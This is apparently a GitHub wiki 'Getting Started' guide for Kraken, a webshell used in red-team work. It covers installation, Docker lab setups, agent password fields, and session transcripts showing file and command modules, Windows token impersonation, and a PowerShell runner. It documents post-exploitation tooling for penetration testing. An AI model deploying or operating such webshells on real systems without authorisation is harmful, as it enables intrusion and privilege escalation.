-
Notifications
You must be signed in to change notification settings - Fork 48
Getting Started
In this section you can find instructions on how to take the first steps with Kraken. Here we detail the installation process and guide you through the different modes and technologies of the tool.
Kraken has some mandatory requirements that must be met. These are the following:
- python3.8 (>= 3.8): the tool contains syntax elements that are only available in versions higher or equal to Python 3.8.
- pip: in the file requirements.txt are the set of libraries that need to be installed for the tool to work. It is important that the pip version is linked to the Python version, otherwise the libraries will not work.
On the other hand, the following is an optional requirements which is only used in certain circumstances:
- docker (>= 20.10.12): it is necessary if we are going to use Java agent/modules. They need to be compiled in order to be loaded by the agent. And, to avoid having each corresponding Java version installed, we use a Docker container to automate the compilation process.
After completing the tool requirements, you can proceed with the installation. The installation process of Kraken may vary depending on the operating system in use (Windows, Linux and MacOS). However, there is a common and recommended process for everything to work correctly.
As Kraken is a tool developed in Python, it has dependencies on Python libraries. To install these libraries, it is recommended to use Conda or Miniconda. This package manager allows you to create "virtual spaces" dedicated to each tool and where they stay isolated without interfering with each other. This is important because, sometimes, we can experience conflicts between libraries when installing them globally. So this is a way to try to ensure that the whole process works independently.
Warning: the process described below is what is recommended, there are other ways to install the packages that Kraken requires. However, in order to avoid possible installation errors, it is recommended to follow these steps.
To complete the installation process in Linux, the following steps must be followed:
-
Install conda/miniconda: visiting its official web site, download the installation script.
-
Give permissions and run the script:
chmod +x Miniconda3-latest-Linux-x86_64.sh
./Miniconda3-latest-Linux-x86_64.sh-
During the conda installation process we specify the path where it is going to be installed (
~/miniconda3) and we checkyesto miniconda to be initialized after the installation. This completes the installation of miniconda. When starting a new terminal we will be able to see in the prompt the default environment: base. -
With conda or miniconda installed, we proceed to create an environment for Kraken. Currently Kraken needs Python 3.8, so in the creation of the environment we specify this version of Python:
conda create -n kraken python=3.8
conda activate kraken- At this point, we have already created the environment for Kraken and we are interacting in it. So we can proceed to clone the tool and install the Python libraries with pip:
git clone --recurse-submodules https://github.com/kraken-ng/Kraken.git
cd Kraken
pip install -r requirements.txt
python kraken.py -hAt this point, we could start communicating with PHP and .NET agents. However, if we wanted to manage a Java agent (which requires the container compiler) we would need to install Docker, which is what we are going to do next.
- To install Docker and Docker Compose we must follow the installation steps from the official website. The installation is different depending on the Linux distribution used. For this example, the installation process for a Debian distribution should be completed. The installation process is summarized as:
# Set up the repository
sudo apt-get update
sudo apt-get install ca-certificates curl gnupg lsb-release
sudo mkdir -m 0755 -p /etc/apt/keyrings
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
# If you get a 404 error when updating packages (Docker package not found) you have to change the `$(lsb_release -cs)` to the corresponding release that Docker needs on your system. In Kali Linux, for example, it should be changed to "bullseye".
echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo chmod a+r /etc/apt/keyrings/docker.gpg
# Install Docker Engine
sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
# Testing Docker with a Hello World container
sudo docker run hello-world
# Add current user to Docker group (to allow the containers to be deployed without sudo), needs restart
sudo usermod -aG docker $USERAnd after that, we could use the Java agents with Kraken.
Installation on Windows varies slightly, but the steps are generally the same:
- Install conda/miniconda: visiting its official web site, download the installation executable.
- Run the downloaded binary and start the installation process. The options to configure during the installation are:
- Installation for our user.
- Select the default installation path.
- The rest of the options we use the ones that come by default.
- After completing the installation, we can look for the application Anaconda Prompt (miniconda) (we can use the version of CMD or Powershell, it is indifferent). When executing the application, a console with the default "base" environment is opened.
- We proceed to create a dedicated environment for Kraken. This environment must have Python 3.8
conda create -n kraken python=3.8
conda activate kraken- We then proceed to clone the project and install the Python libraries that Kraken needs.
git clone --recurse-submodules https://github.com/kraken-ng/Kraken.git
cd Kraken
pip install -r requirements.txt
python kraken.py -h- As an additional step in Windows installations, we must correct the symbolic links of the modules folder (when cloning the repository the references are lost). We run a miniconda console as administrator and, from the Kraken environment, we execute:
cd utils/fix_symbolic_links
python fix_symbolic_links.py --modules-path ..\..\modulesAfter this step the modules should be correct, you can make sure by visiting the subfolders of the
modulesdirectory and checking that there are symbolic links to certain versions of the modules.
- Finally, it remains to install Docker Desktop to be able to use the Java agents/modules. You can download the executable from its official website and install it. After completing the process, Docker can be used from the Conda/Miniconda console.
The installation process of Miniconda is almost the same as in Linux. The only difference is that you must choose the Miniconda installation file according to the MAC version you have: "Miniconda3 macOS Intel x86 64-bit bash" or "Miniconda3 macOS Apple M1 64-bit bash" (you can check this information in the "About this MAC" section in the system configuration).
After installing Miniconda, proceed to configure the environment to initialize with the zsh shell and then create the environment for Kraken (in the same way as in the Linux section).
After completing the installation and configuration of Miniconda and installing the Kraken dependencies, proceed to install Docker.
To install Docker on MAC, follow the steps in the Official Documentation. Basically, the steps are as follows:
- You download the package, depending on the processor you have (Intel or Apple Silicon).
- Then double click on the downloaded Docker.dmg file. And drag the Docker icon to the Applications folder.
- Then, initialize the Application Menu application, and proceed to follow the steps indicated in the initial configuration window. It is recommended to follow the recommended configuration until the end of the installation process.
- After this, if you open a new Terminal, you will have the "docker" and "docker-compose" binaries (required for Kraken).
After completing the installation process, you can execute Kraken to see the help menu:
usage: kraken.py [-h] [-g] [-c] [-m {st,c2}] -p PROFILE -k {raw,container,precompiled,csc} [-d] [-l]
Kraken, a modular multi-language webshell (coded by @secu_x11)
optional arguments:
-h, --help show this help message and exit
-g, --generate Generate a webshell (php/jsp/aspx)
-c, --connect Connect to a deployed webshell
-m {st,c2}, --mode {st,c2}
Mode of operation with agent
-p PROFILE, --profile PROFILE
Filepath of Connection Profile to use
-k {raw,container,precompiled,csc}, --compiler {raw,container,precompiled,csc}
Name of the compiler to use
-d, --debug Turn ON Debug Mode
-l, --log Log all executed commands and outputs
The use of Kraken will depend, firstly, on the chosen mode and, secondly, on the agent/module technology to be used.
However, they all have one thing in common, which will be explained below:
First of all, before starting to use Kraken, we must choose the web technology we are going to test. Currently Kraken supports in its agents and modules a number of versions and technologies, to see this information, visit the support section.
Once we have chosen the technology, we can proceed to create the environment where we will test Kraken.
For this (generic) example, we will use the PHP technology on a Linux machine.
In this step, we must select the environment in which we are going to use Kraken.
During a red team exercise or pentesting, the environment would be that web service where we can upload a web implant. However, to test the tool, a series of test environments have been designed according to the technology on which we want to validate. This is explained in the test environments section.
For this (generic) example, we will use the LAP (Linux + Apache + PHP) environments for testing.
If you are not going to check the tool in a test environment, you can skip this step. Otherwise, we will proceed to deploy the test environment chosen in the previous step.
To deploy the LAP (Linux + Apache + PHP) environment, we will use docker and docker compose to automate the creation.
Kraken provides, in the environments repository a configuration file for docker compose (YAML).
In this configuration file we specify a volume to map the agent used to the container's web service folder.
In this line, we will specify the relative path where our agent is, or we can use the one that comes and then modify the agent configuration (both options are valid).
To deploy the environment, from the root of the project (Kraken), we execute the following command:
(kraken) secu@x11:~/Kraken$ docker compose -f envs/php/docker-compose.yml up -d
[+] Running 4/4
⠿ Network php_apps Created
⠿ Container php5-apache Started
⠿ Container php7-apache Started
⠿ Container php8-apache Started
This command will deploy the LAP environments and map our agent directly to the web directory. After a few seconds, you should be able to find an Apache + PHP at the address http://localhost:8000/index.php
We can also find our agent at http://localhost:8000/agent_st.php (or, if you have renamed the file, with the specified name). The Kraken agent, when visited directly, will return a 400 error (indicating that the expected HTTP method is not being used).
Whether we have deployed a test environment to use Kraken, or if we are going to use it in production (in a red team or pentest), we can modify the contents of the agent to define the operation to our needs.
The parameters to edit in any of the agents are defined at the beginning of the class, and are the following:
public $REQUEST_METHOD = "POST";
private $PASSWORD_TYPE = "COOKIE";
private $PASSWORD_KEY = "X-Authorization";
private $PASSWORD_VALUE = "P4ssw0rd!";
private $REQUEST_DATA_TYPE = "FIELD";
private $REQUEST_DATA_KEY = "data";
private $RESPONSE_DATA_KEY = "data";The details for each of them are:
- REQUEST_METHOD: indicates the HTTP verb to be used in client for HTTP requests.
- PASSWORD_TYPE: type of field where the authentication/encryption password will be embedded (available fields are: HEADER, COOKIE and FIELD).
- PASSWORD_KEY: name of the field used to embed the password (this would be the "key" of the key:value pair).
- PASSWORD_VALUE: value of the password to be used for authentication and encryption (this would be the "value" of the key:value pair).
- REQUEST_DATA_TYPE: type of field where the information that the client sends to the agent: modules, arguments, references, etc (the available fields are: HEADER, COOKIE and FIELD).
- REQUEST_DATA_KEY: name of the field used to embed the information sent by the client (this would be the "key" of the key:value pair).
- RESPONSE_DATA_KEY: name of the field used to embed the information transmitted by the agent in the HTTP response (this would be the "key" of the key:value pair). The client must know where to extract this data from.
It is recommended to modify the agent, especially when it is used in a production environment. The rest of the agent fields, in principle, should not need to be modified.
Once this information has been modified in the agent, you can proceed to upload it to production or to the test environment (in the last one we can edit the volume file directly).
With the environment and the agent deployed, we proceed to generate a connection profile that we will use with Kraken to communicate.
As an example, I will use the connection profile used with the LAP test environment, which you can find here. For more information about the structure and generation of connection profiles visit their section.
{
"client" : {
"url" : "http://localhost:8000/agent_st.php",
"skip_ssl": false,
"method" : "POST",
"headers" : {
"Host" : "localhost:8000",
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
},
"cookies" : {},
"fields" : {},
"message" : {
"secret" : {
"type" : "COOKIE",
"key" : "X-Authorization",
"value" : "P4ssw0rd!"
},
"data" : {
"type" : "FIELD",
"key" : "data"
}
}
},
"server" : {
"type" : "FIELD",
"key" : "data"
}
}Important: in case we have made any modifications in the agent fields (previous step), we should reflect these changes in the connection profile.
In this example, the default PHP Standard agent will be used along with the default LAP connection profile as well.
Then, to connect, we must specify the following information to Kraken:
-
Action: there are 2 types of actions in Kraken:
-g, --generateor-c, --connect. The generator is not implemented for now, in the future it will be possible to generate agents based on templates but, for now, the agents are static. -
Mode: there are 2 modes in Kraken:
st(standard) orc2(command-and-control). The operation in each mode is different, so there are different types of agents. For more information visit the operating modes section. - Connection Profile: contains the path where the connection profile (JSON) to be used is located.
- Compiler: indicates the type of compiler to be used to "process" the modules. The compiler and the agent executor are related. For more information visit the compilers section.
- Debug: enables debug mode for debugging issues (currently not fully implemented).
- Logger: currently enables the extended logger (records the commands and outputs obtained, so that a complete execution history is available).
For this example, I will use the following arguments with the client:
- Action:
-c(connect) - Mode:
-m st(standard mode) - Connection Profile:
-p <filepath>(profile path) - Compiler:
-k raw(since PHP only supports the treatment of modules in plaintext).
With all this information, we can define the connection command:
(kraken) secu@x11 ~/Kraken (main)$ python kraken.py -c -m st -p utils/req2profile/examples/profile_testing_php_linux_st.json -k raw
(ST) www-data@c48827a1b2ac:/var/www/html$ help
+------------+--------+-----------------------------------------------------------------------------------+-----------------+
| Command | Type | Description | Authors |
+------------+--------+-----------------------------------------------------------------------------------+-----------------+
| exit | Core | Ends the session with the agent | @secu_x11 |
| help | Core | Displays the available commands or information of a command passed as an argument | @secu_x11 |
| cat | Module | Read file contents | @secu_x11 |
| cd | Module | Change working directory | @secu_x11 |
| chmod | Module | Change file permissions of file or multiple files | @secu_x11 |
| cp | Module | Copy file or multiple files | @secu_x11 |
| download | Module | Download a remote file to a local path | @secu_x11 |
| execute | Module | Execute a binary or command and retrieve output | @secu_x11 |
| find | Module | Find files of directory using a pattern | @secu_x11 |
| grep | Module | Search for files whose content matches a pattern | @secu_x11 |
| id | Module | Displays information about the currently logged-in user | @secu_x11 |
| ls | Module | List files or directories | @secu_x11 |
| mkdir | Module | Create directories and/or subdirectories | @r1p, @secu_x11 |
| netstat | Module | Show listening ports, arp table and machine's net routes | @secu_x11 |
| ps | Module | List the processes running on the machine | @secu_x11 |
| pspy | Module | Monitor processes on the machine | @secu_x11 |
| rm | Module | Remove file or multiple files | @secu_x11 |
| sysinfo | Module | Get basic system info about compromised machine | @secu_x11 |
| tcpconnect | Module | Connect to TCP Port | @secu_x11 |
| touch | Module | Change the date of an existing file or multiple files | @secu_x11 |
| upload | Module | Upload a local file to remote filepath | @secu_x11 |
| webinfo | Module | Get basic web server info about compromised machine | @secu_x11 |
+------------+--------+-----------------------------------------------------------------------------------+-----------------+
In case you do not connect or receive an error, please visit the FAQ section as you may find the solution to your problem there.
Once we have passed this first stage of "generic use" (which applies to all technologies), we will proceed to show a series of more advanced examples of use. We will begin by dividing the examples into two blocks: Standard Mode and Command and Control Mode.
To continue with the examples of the standard mode, we are going to show the differences of the remaining technologies in relation to the previous one.
We start with Java agents and modules. This technology has a peculiarity in relation to PHP, and it is the way of "processing" the modules.
Currently, the only Java executor loads and evaluates modules using a Java Runtime functionality called: ClassLoader.
The concept, basically, consists of "pre-compiling" the modules locally, generating a .class file (Java bytecode). The Client sends this class to the agent, which loads and invokes it.
To perform this process, it is necessary to have the (corresponding) Java version installed on the machine. To solve this dependency problem, Kraken automates the compilation process through Docker containers.
In summary, Kraken, determines in runtime the version of the Agent, deploy the appropriate container for its compilation, and precompiles all those modules that can be used in that version. For this, you must specify in the Kraken arguments that the container compiler be used.
For this example, we are going to use the Java test environment (Linux + Tomcat) with its corresponding connection profile.
As there are many containers within the Java test environment, we specify that you only deploy the Tomcat container with Java 17.
(kraken) secu@x11 ~/Kraken (main)$ docker compose -f envs/java/docker-compose.yml up java17-tomcat -d
[+] Running 2/2
⠿ Network java_apps Created
⠿ Container java17-tomcat Started
With the environment deployed, we proceed to connect to the agent:
(kraken) secu@x11 ~/Kraken (main)$ python kraken.py -c -m st -p utils/req2profile/examples/profile_testing_java_linux_st.json -k container
[*] Detected agent of type: 'java' with version: '17.0.6'
[*] Running container from image: 'openjdk:17'
[*] Container of image 'openjdk:17' was loaded
[*] Precompiling modules for faster first loading
[*] Module 'cat' was compiled successfully
[*] Module 'cd' was compiled successfully
[*] Module 'cp' was compiled successfully
[*] Module 'download' was compiled successfully
[*] Module 'execute' was compiled successfully
[*] Module 'id' was compiled successfully
[*] Module 'ls' was compiled successfully
[*] Module 'mkdir' was compiled successfully
[*] Module 'rm' was compiled successfully
[*] Module 'sysinfo' was compiled successfully
[*] Module 'tcpconnect' was compiled successfully
[*] Module 'touch' was compiled successfully
[*] Module 'upload' was compiled successfully
[*] Compiled 13 modules successfully!
(ST) root@0713797cbc28:/usr/local/tomcat/webapps/ROOT/$ sysinfo
Hostname: 0713797cbc28
IP: 172.22.0.2
OS: Linux 5.15.0-58-generic amd64
User: root
Path: /usr/local/tomcat/webapps/ROOT
Version: OpenJDK Runtime Environment 17.0.6+10
(ST) root@0713797cbc28:/usr/local/tomcat/webapps/ROOT/$ exit
[*] Unloading container (please be patient)
(kraken) secu@x11 ~/Kraken (main)$
When you exit the Kraken console, it handles the task of unloading the container and deleting the temporary files used during the process.
Currently, it is possible to recompile modules at runtime with the core command: recompile
(ST) root@0713797cbc28:/usr/local/tomcat/webapps/ROOT/$ help recompile
usage: recompile [module [module ...]]
Recompile one or multiple modules (use 'all' to recompile all modules)
positional arguments:
module Module/s to recompile
Examples:
recompile ls
recompile ls cat id ps
recompile all
(ST) root@0713797cbc28:/usr/local/tomcat/webapps/ROOT/$ recompile id
[*] Re-compiling module/s...
[*] Module 'id' was compiled successfully
[*] Compiled 1 modules successfully!
(ST) root@0713797cbc28:/usr/local/tomcat/webapps/ROOT/$
The .NET Agent (aspx) has a number of features that make it slightly different from other technologies:
First of all, .NET agents and modules have access to a large repertoire of functionalities. On the one hand, the libraries and functions that NET Framework contains (which is a great variety), and on the other hand, unmanaged functionalities can be accessed from managed code through P/Invoke (which allows the use of WinApi functions).
Secondly, the .NET agent uses a number of arguments unique to this agent, which the client provides in message passing:
- Token: this is a signed integer representing the reference to a Windows Access Token. The Agent will use this reference to impersonate the token identity and execute the module in its security context.
(kraken) secu@x11 ~/Kraken (main)$ python kraken.py -c -m st -p utils/req2profile/examples/profile_testing_cs_win_st.json -k raw
(ST) IIS APPPOOL\DefaultAppPool@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$ sysinfo
Hostname: DESKTOP-DH3LRI4
IP: 192.168.30.131
OS: Microsoft Windows NT 10.0.19045.0 x64
User: IIS APPPOOL\DefaultAppPool
Path: C:/inetpub/wwwroot
Version: 4.0.30319.42000
(ST) IIS APPPOOL\DefaultAppPool@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$ list_tokens
TOKEN USERNAME NETWORK ACCESS INTEGRITYLEVEL
624 nt authority\iusr True HIGH
880 iis apppool\defaultapppool True HIGH
(ST) IIS APPPOOL\DefaultAppPool@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$ impersonate . secu P4ssw0rd!
Impersonated user: '.\secu' with Token: '1944'
(ST) IIS APPPOOL\DefaultAppPool@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$ list_tokens
TOKEN USERNAME NETWORK ACCESS INTEGRITYLEVEL
624 nt authority\iusr True HIGH
880 iis apppool\defaultapppool True HIGH
1944 desktop-dh3lri4\secu True MEDIUM
(ST) IIS APPPOOL\DefaultAppPool@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$ set_token 1944
Impersonated user: 'DESKTOP-DH3LRI4\secu' with token: '1944'
(ST) DESKTOP-DH3LRI4\secu@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$ whoami
USERNAME SID
DESKTOP-DH3LRI4\secu S-1-5-21-3353655227-76069884-3274741854-1000
(ST) DESKTOP-DH3LRI4\secu@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$ rev2self
[*] Token 1944 has been dereferenced (this does not mean that the token has been released)
(ST) IIS APPPOOL\DefaultAppPool@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$ whoami
USERNAME SID
IIS APPPOOL\DefaultAppPool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
(ST) IIS APPPOOL\DefaultAppPool@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$
Impersonation can be used for user context switching, but also for privilege elevation management. A Kraken module can be used to leak an Access Token as SYSTEM (or another privileged user) and use this token to execute actions with the same level of privileges.
- References: some .NET modules require additional libraries (DLL) that are not inside the NET Framework. When the Agent receives the module, it also gets, in case it needs them, the paths to these libraries that it links during the compilation process in memory.
{
"name" : "powerpick",
"description" : "Run Powershell code or files using Unmanaged Powershell with Runspaces",
"author" : "@secu_x11",
"template" : "powerpick",
"examples" : [
"powerpick Get-Host",
"powerpick -f /tmp/myscript.ps1",
"powerpick -f /tmp/PrivescCheck.ps1 Invoke-PrivescCheck",
"powerpick -f /tmp/PrivescCheck.ps1 -- Invoke-PrivescCheck -Extended",
],
"so" : [
{
"name" : "Windows",
"agents" : ["cs"]
}
],
"args": [
{
"-f": {
"help": "Local Filepath of Powershell Script",
"nargs": 1,
"type": str,
"required": 0
},
"arguments": {
"help": "Powershell commands to execute or append to script",
"nargs": "*",
"type": str
}
}
],
"references": [
"C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll"
],
"dispatcher" : "powerpick",
"formater" : "default"
}In the configuration of the powerpick module, you can see the reference to: System.Management.Automation.dll (library not included in NET Framework).
(ST) IIS APPPOOL\DefaultAppPool@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$ ls C:/Windows/assembly/GAC_MSIL/System.Management.Automation/
1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll
-r- NT SERVICE\TrustedInstaller 2.9 MB 07/12/2019 10:09:54 C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll
(ST) IIS APPPOOL\DefaultAppPool@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$ powerpick Get-Host
Name : Default Host
Version : 5.1.19041.2364
InstanceId : c6f27169-7829-42e3-87ca-2de054c4e0ed
UI : System.Management.Automation.Internal.Host.InternalHostUserInterface
CurrentCulture : en-GB
CurrentUICulture : en-GB
PrivateData :
DebuggerEnabled : True
IsRunspacePushed :
Runspace :
(ST) IIS APPPOOL\DefaultAppPool@DESKTOP-DH3LRI4:C:/inetpub/wwwroot$
Finally, we will conclude this section with an example of the Command and Control Mode. In this mode, we manage the modules we are using by querying, loading, unloading and invoking them. For more details about this mode, visit the c2 mode section.
Currently this mode is only supported for PHP technology, so we will use this agent in the following example:
(kraken) secu@x11 ~/Kraken (main)$ python kraken.py -c -m c2 -p utils/req2profile/examples/profile_testing_php_linux_c2.json -k raw
[*] Detected new cookie: "PHPSESSID" = "deaa1240ada8f3afe949f5fc070bfab3"
(C2) www-data@c48827a1b2ac:/var/www/html$ help
+-----------------+--------+-----------------------------------------------------------------------------------+-----------------+
| Command | Type | Description | Authors |
+-----------------+--------+-----------------------------------------------------------------------------------+-----------------+
| exit | Core | Ends the session with the agent | @secu_x11 |
| help | Core | Displays the available commands or information of a command passed as an argument | @secu_x11 |
| list_modules | Core | List modules loaded in the agent | @secu_x11 |
| load_module | Core | Load a new agent module/s (use 'all' to load all available modules) | @secu_x11 |
| unload_module | Core | Unload an existing agent module/s (use 'all' to unload all loaded modules) | @secu_x11 |
| refresh_modules | Core | Refresh module status from agent (update agent's memory in use) | @secu_x11 |
| clean_modules | Core | Unload all agent modules | @secu_x11 |
| cat | Module | Read file contents | @secu_x11 |
| cd | Module | Change working directory | @secu_x11 |
| chmod | Module | Change file permissions of file or multiple files | @secu_x11 |
| cp | Module | Copy file or multiple files | @secu_x11 |
| download | Module | Download a remote file to a local path | @secu_x11 |
| execute | Module | Execute a binary or command and retrieve output | @secu_x11 |
| find | Module | Find files of directory using a pattern | @secu_x11 |
| grep | Module | Search for files whose content matches a pattern | @secu_x11 |
| id | Module | Displays information about the currently logged-in user | @secu_x11 |
| ls | Module | List files or directories | @secu_x11 |
| mkdir | Module | Create directories and/or subdirectories | @r1p, @secu_x11 |
| netstat | Module | Show listening ports, arp table and machine's net routes | @secu_x11 |
| ps | Module | List the processes running on the machine | @secu_x11 |
| pspy | Module | Monitor processes on the machine | @secu_x11 |
| rm | Module | Remove file or multiple files | @secu_x11 |
| sysinfo | Module | Get basic system info about compromised machine | @secu_x11 |
| tcpconnect | Module | Connect to TCP Port | @secu_x11 |
| touch | Module | Change the date of an existing file or multiple files | @secu_x11 |
| upload | Module | Upload a local file to remote filepath | @secu_x11 |
| webinfo | Module | Get basic web server info about compromised machine | @secu_x11 |
+-----------------+--------+-----------------------------------------------------------------------------------+-----------------+
(C2) www-data@c48827a1b2ac:/var/www/html$ list_modules
+----+------+----------+------+
| ID | Name | Filepath | Date |
+----+------+----------+------+
+----+------+----------+------+
Total memory in use: 0 B
(C2) www-data@c48827a1b2ac:/var/www/html$ load_module sysinfo ls id cd
[*] Loaded module 'sysinfo' successfully
[*] Loaded module 'ls' successfully
[*] Loaded module 'id' successfully
[*] Loaded module 'cd' successfully
(C2) www-data@c48827a1b2ac:/var/www/html$ list_modules
+------------+---------+----------------------------------+---------------------+
| ID | Name | Filepath | Date |
+------------+---------+----------------------------------+---------------------+
| 523453412 | sysinfo | modules/sysinfo/sysinfo.php8.php | 2023/02/22 00:12:57 |
| 1915659346 | ls | modules/ls/ls.php8.php | 2023/02/22 00:12:57 |
| 238096256 | id | modules/id/id.php8.php | 2023/02/22 00:12:57 |
| 1992344736 | cd | modules/cd/cd.php8.php | 2023/02/22 00:12:57 |
+------------+---------+----------------------------------+---------------------+
Total memory in use: 7.82 KB
(C2) www-data@c48827a1b2ac:/var/www/html$ sysinfo
Hostname: c48827a1b2ac
IP: 172.19.0.2
OS: Linux c48827a1b2ac 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64
User: www-data
Path: /var/www/html/agent_c2.php
Version: 8.0.25
(C2) www-data@c48827a1b2ac:/var/www/html$ cd ..
(C2) www-data@c48827a1b2ac:/var/www$ ls
drwxr-xr-x 1 root root 4096 2022/11/15 04:13:21 .
drwxr-xr-x 1 root root 4096 2022/11/15 04:13:21 ..
drwxrwxrwx 1 www-data www-data 4096 2023/02/21 22:58:28 html
(C2) www-data@c48827a1b2ac:/var/www$ unload_module id
[*] Unloaded module 'id' successfully
(C2) www-data@c48827a1b2ac:/var/www$ list_modules
+------------+---------+----------------------------------+---------------------+
| ID | Name | Filepath | Date |
+------------+---------+----------------------------------+---------------------+
| 523453412 | sysinfo | modules/sysinfo/sysinfo.php8.php | 2023/02/22 00:12:57 |
| 1915659346 | ls | modules/ls/ls.php8.php | 2023/02/22 00:12:57 |
| 1992344736 | cd | modules/cd/cd.php8.php | 2023/02/22 00:12:57 |
+------------+---------+----------------------------------+---------------------+
Total memory in use: 6.63 KB
(C2) www-data@c48827a1b2ac:/var/www$ clean_modules
[*] Clean modules from agent successfully
(C2) www-data@c48827a1b2ac:/var/www$ list_modules
+----+------+----------+------+
| ID | Name | Filepath | Date |
+----+------+----------+------+
+----+------+----------+------+
Total memory in use: 0 B
(C2) www-data@c48827a1b2ac:/var/www$ exit
A point to highlight is that, we can keep the modules in the agent and exit the Kraken console. If we want to connect to the same agent and continue using the loaded modules, we must use the session identifier that Kraken shows us when connecting to the agent.